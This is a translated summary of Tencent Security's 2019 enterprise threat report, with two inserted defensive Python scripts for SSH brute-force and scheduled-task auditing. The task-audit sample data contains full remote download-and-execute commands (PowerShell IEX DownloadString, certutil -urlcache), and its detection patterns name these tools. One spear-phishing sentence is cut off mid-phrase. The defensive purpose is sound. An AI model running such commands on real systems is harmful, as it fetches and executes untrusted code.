In the era of the industrial Internet, new technologies such as big data, cloud computing and artificial intelligence are accelerating the development of industry, but they also leave enterprise network security facing more complex challenges. Recently, Tencent Security released its 2019 Enterprise Security Threat Report (hereinafter "the report"), which comprehensively analyzes the overall state of enterprise network security over the year, the main virus types, the industries in which viruses were distributed, attack forms, propagation methods and development trends, and puts forward targeted defense plans.
According to the report, among all targets, enterprise endpoints remain the hardest-hit area of virus infection. In 2019, on average, 40% of enterprises suffered virus attacks every week, and nearly 80% of enterprise endpoints still had unpatched high-risk vulnerabilities.
Risky Trojan software accounts for the highest proportion of infections; the education sector is hit hardest
Among enterprise endpoint risks, risky Trojan software, backdoors and file-infecting viruses are the three major threats. Risky Trojan software accounts for the highest share of virus attacks, 44%: its operators reach large numbers of victims by bundling it with downloaders and buying priority placement in search-engine rankings. Backdoor remote-control Trojans follow at 21%. Because they are highly concealed and accept remote instructions to steal information, take screenshots, upload files and perform other operations, they have done great harm to information-sensitive industries such as fintech.
Among all virus types, cryptomining Trojans remain the main payload implanted after an enterprise server is compromised. In 2019, mining Trojans for the Linux platform began to spread widely. For example, in September 2019 WannaMine, a large-scale mining botnet, launched an attack on Linux systems: the attacker brute-forced weak SSH passwords, planted the mining Trojan on the compromised host, and then spread laterally across the intranet by brute-forcing weak SSH passwords on other hosts. Although ransomware accounts for only a small proportion of virus infection incidents, behaviours such as encrypting data, locking systems and demanding higher ransoms based on the value of enterprise data cause serious losses and great damage, so enterprises still need to focus on preventing it.
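As an added example (not code from the report or from Tencent), the following Python detection logic looks for the pattern described above, a burst of failed SSH password guesses from one source followed by a successful password login, over a few constructed sshd log lines; the hostnames, addresses, thresholds and window are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample sshd lines (syslog format; not data from the report): one source
# fails five password guesses for root and then logs in; a real user logs in with a key.
SAMPLE_AUTH_LOG = """\
Sep 10 02:14:01 web01 sshd[2211]: Failed password for root from 10.0.0.25 port 51022 ssh2
Sep 10 02:14:02 web01 sshd[2211]: Failed password for root from 10.0.0.25 port 51023 ssh2
Sep 10 02:14:02 web01 sshd[2213]: Failed password for invalid user admin from 10.0.0.25 port 51024 ssh2
Sep 10 02:14:03 web01 sshd[2213]: Failed password for root from 10.0.0.25 port 51025 ssh2
Sep 10 02:14:03 web01 sshd[2213]: Failed password for root from 10.0.0.25 port 51026 ssh2
Sep 10 02:14:04 web01 sshd[2215]: Accepted password for root from 10.0.0.25 port 51027 ssh2
Sep 10 02:20:30 web01 sshd[2302]: Accepted publickey for alice from 192.168.5.7 port 40002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<mon>\w{3}) +(?P<day>\d{1,2}) (?P<time>\d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<src>\d{1,3}(?:\.\d{1,3}){3}) port \d+"
)

def parse_events(log_text):
    """Yield (timestamp, result, method, user, src) for each sshd auth line that matches."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # other syslog noise is ignored
        # syslog carries no year; strptime defaults to 1900, fine for relative deltas
        ts = datetime.strptime(f"{m['mon']} {m['day']} {m['time']}", "%b %d %H:%M:%S")
        yield ts, m["result"], m["method"], m["user"], m["src"]

def find_brute_force_logins(log_text, threshold=5, window_s=300):
    """Flag an accepted password login preceded by >= threshold failures from its source within window_s."""
    recent_failures = defaultdict(deque)  # src -> failure timestamps inside the window
    alerts = []
    for ts, result, method, user, src in parse_events(log_text):
        q = recent_failures[src]
        while q and (ts - q[0]).total_seconds() > window_s:
            q.popleft()  # expire failures older than the window
        if result == "Failed":
            q.append(ts)
        elif method == "password" and len(q) >= threshold:
            alerts.append({"src": src, "user": user, "failures": len(q), "at": ts.strftime("%H:%M:%S")})
            q.clear()  # one alert per burst
    return alerts

if __name__ == "__main__":
    for a in find_brute_force_logins(SAMPLE_AUTH_LOG):
        print(f"possible SSH brute force: {a['src']} logged in as {a['user']} after {a['failures']} failures at {a['at']}")
```

The same check run over the hosts a suspected source later connects to is what exposes the lateral spread the paragraph describes.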
By industry, virus attacks affect education, technology, healthcare, finance, government and other sectors differently; education is the hardest hit, which is related to the frequent exchange of files in that sector. The report shows that among virus-infected endpoints, the education sector accounts for the largest share: 57.4% of file-infecting virus infections are in education, and more than 50% of the machines infected by remote-control Trojans and ransomware also belong to it. Government and the technology industry are the next most common targets of virus attacks; among ransomware infections, government machines account for 23% of infected hosts.
Nearly 80% of enterprise endpoints have high-risk vulnerabilities; malicious email has become a spreading tool
According to the report, in 2019 vulnerability exploitation and port brute-forcing remained important means of compromising endpoint devices, especially in attacks on enterprise servers: compromising servers exposed on the public network through exploitation or brute force and then moving laterally into the internal network has become the most commonly used approach.
Weak defensive deployment is an important reason why virus attacks succeed. According to data from the Tencent Security Threat Intelligence Center, as of the end of December 2019, 79% of enterprise endpoints still had at least one unpatched high-risk vulnerability. At the same time, a large number of enterprise assets still have high-risk ports open: besides 22, 3389 and other high-risk ports, a large proportion of email, database and other service ports are exposed on the public network, creating opportunities for cybercrime groups. The report also notes that in 2019 about 40% of enterprises had endpoint Trojan infections every week.
Remote code execution (RCE), SQL injection, XSS and webshells are the most common types of attack against servers. To maximise the benefit of their malicious activity, cybercrime groups are moving toward spreading within the intranet and establishing persistence. For lateral movement within the intranet, vulnerability exploitation, weak-password brute forcing and file shares are the main means. For persistence, packing and obfuscating the malware, padding it to defeat scanning, and placing it in registry autorun keys or the startup folder are simple and hard to detect and remove, so they are favoured by the criminal industry; writing itself into a scheduled task is a more hidden and flexible way of staying resident, and scheduled tasks frequently abuse whitelisted (legitimate) tools to download the payload remotely.
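As an added illustration (not from the report or from Tencent), this Python script audits exported scheduled-task actions for the persistence traits the paragraph describes: a task whose command fetches content from a URL, calls a built-in tool capable of downloading, hides its window, or launches a binary from a directory any user can write to. The task entries, patterns and finding codes are constructed assumptions.

```python
import re

# Constructed scheduled-task entries (task name and the command it runs), in the shape a
# defender gets from exporting the task scheduler; they are not data from the report.
SAMPLE_TASKS = [
    {"name": r"\Microsoft\Windows\Defrag\ScheduledDefrag",
     "action": r"%windir%\system32\defrag.exe -c -h -o -$"},
    {"name": r"\Updater",
     "action": r"powershell.exe -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"},
    {"name": r"\SysHelper",
     "action": r"certutil.exe -urlcache -split -f http://203.0.113.9/s.txt C:\Users\Public\s.exe"},
    {"name": r"\Backup",
     "action": r"C:\Users\bob\AppData\Roaming\bk.exe /q"},
]

# Each rule is (finding code, compiled pattern). The patterns cover what the article calls
# remote download through whitelisted tools, plus binaries run from user-writable paths.
RULES = [
    ("remote_url", re.compile(r"https?://", re.I)),
    ("download_tool", re.compile(
        r"certutil(\.exe)?\s.*-urlcache|bitsadmin(\.exe)?\s.*/transfer"
        r"|powershell(\.exe)?\s.*(DownloadString|DownloadFile|Invoke-WebRequest|IEX|Invoke-Expression)", re.I)),
    ("hidden_window", re.compile(r"-w(indowstyle)?\s+hidden|-nop\b", re.I)),
    ("user_writable_path", re.compile(r"\\(Users|Temp|ProgramData)\\", re.I)),
]

def audit_tasks(tasks, rules=RULES):
    """Return {task name: [finding codes]} for every task whose action matches at least one rule."""
    findings = {}
    for task in tasks:
        hits = [code for code, pattern in rules if pattern.search(task["action"])]
        if hits:
            findings[task["name"]] = hits  # unflagged tasks (e.g. the built-in defrag job) are omitted
    return findings

if __name__ == "__main__":
    for name, hits in audit_tasks(SAMPLE_TASKS).items():
        print(f"{name}: {', '.join(hits)}")
```

A task with two or more findings (a URL plus a download-capable tool, say) is the case worth reviewing first; a lone user-writable path is common for legitimate per-user software and needs the binary checked before acting.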
In addition, malicious email has become the delivery tool of choice for cybercrime groups launching targeted attacks. Spear-phishing emails, for example, carefully collect information about the target and then craft the email subject and content around that information to trick the target into running a malicious attachment. Tencent's Advanced Threat Detection System (Tencent Yujie) has captured a number of such cases, with attackers carrying elaborately constructed
Building up the information security line of defense: a whole-process defense system covering before, during and after an attack
According to the report, ransomware and mining Trojans continued to spread in 2019, high-risk vulnerabilities and data-leak incidents occurred frequently, and the security situation cannot be ignored. As the security confrontation keeps escalating, network attacks will intensify further; in particular, with the development of cloud computing and the spread of 5G, more and more enterprises will move their business to the cloud, and the larger attack surface will make the environment enterprises face more complex and the security situation more severe. Tencent Security experts therefore remind enterprises to pay more attention to network attacks, improve their ability to discover and actively respond to them, and strive to build a stronger information security line of defense.
To avoid a significant impact from network attacks, Tencent Security experts recommend that enterprises close unnecessary ports on servers (such as 135, 139 and 445); harden servers regularly and patch security vulnerabilities in the relevant server components as soon as possible; enforce strong passwords on the intranet through password security policies to prevent brute-force cracking; and enable a dedicated backup system for key business services, keeping multiple copies including off-site backups, just in case.
At the same time, Tencent Security has also built an overall solution for the current state of enterprise security. For enterprises running business in the cloud, it recommends enabling the Tencent Cloud Security Operations Center (SOC) to manage the security of cloud business across the whole process: pre-incident prevention, in-incident threat detection and post-incident response. Enterprises that have not yet moved business to the cloud can deploy the Tencent Security Operations Center (private cloud) for centralised security operations.
In addition, the Tencent Security Network Asset Risk Detection System (Tencent Yuzhi) can comprehensively detect whether network assets are affected by security vulnerabilities; the Tencent Security Advanced Threat Detection System (Tencent Yujie) can detect intrusion and penetration attacks on enterprise networks based on network traffic; the Tencent Security Endpoint Security Management System (Yudian) can intercept all kinds of virus and Trojan attacks; and Tencent Security's threat intelligence service provides the latest threat detection capabilities. By deploying the corresponding security products, enterprises can strengthen their defenses and prevent incidents before they happen.
The Tencent Security Network Asset Risk Detection System detecting enterprise network asset risk in real time